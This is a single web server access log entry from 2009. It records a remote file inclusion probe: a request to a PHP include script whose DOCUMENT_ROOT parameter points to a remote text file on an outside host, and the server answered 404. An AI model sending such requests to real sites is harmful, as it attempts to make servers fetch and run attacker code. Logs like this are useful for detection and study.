79.174.78.83 - - [07/Sep/2009:10:49:10 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
